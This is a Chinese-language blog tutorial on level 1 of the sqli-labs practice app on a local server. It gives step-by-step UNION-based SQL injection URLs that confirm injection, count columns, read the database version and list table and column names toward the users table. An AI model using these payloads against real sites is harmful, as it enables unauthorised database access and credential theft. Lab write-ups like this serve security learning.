SQL注入:sqli第一关

一、实验设备:

需要下载并安装phpstudy_pro,下载sqli-labs-php7-master解压到/phpstudy_pro/www中。

二、实验步骤:

1、在id=1后加入一个闭合符号“ ‘ ”,但是当你输入?id=1',是会报错的,

http://127.0.0.1/sincer/Less-1/?id=1%27

然后在后面加上--qwe将后面注释掉,如果没有报错,则证明为字符型。

http://127.0.0.1/sincer/Less-1/?id=1%27%20--%20qwe

 

 2、猜字段,使用order by查询字段个数,逐渐增加order by后面的数字,从1开始一直到报错为止,当order by到第四个字段时就报错了,所以说明有三个字段。

http://127.0.0.1/sincer/Less-1/?id=1%27%20order%20by%204%20--%20qwe

3、 用select查询三个字段,目的是为了知道那几个字段在前端显示,这样我们可以将想要查询的数据将前端显示的字段替换掉,在这里查询数据库版本。但是要注意前面的id就不能是1,而是要改为id=-1,这样做的目的是为了让前面的查询语句不执行,这样后面查询的version()才能显示出来。

http://127.0.0.1/sincer/Less-1/?id=-1%27%20union%20select%201,2,3%20--%20qwe

 先用MySQL查看版本号

然后将1,2,3中的2或者3换成 version()即可

http://127.0.0.1/sincer/Less-1/?id=-1%27%20union%20select%201,version(),3%20--%20qwe

 

4、 使用show databases;查询数据库,其中的information_schema库中有我们所需要的表名与库名。

http://127.0.0.1/sincer/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--%20qwe

5、现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据库都会存储到users中,所以嘞我们现在需要查询users这个表中的所有字段是啥子。

http://127.0.0.1/sincer/Less-1/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--%20qwe

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值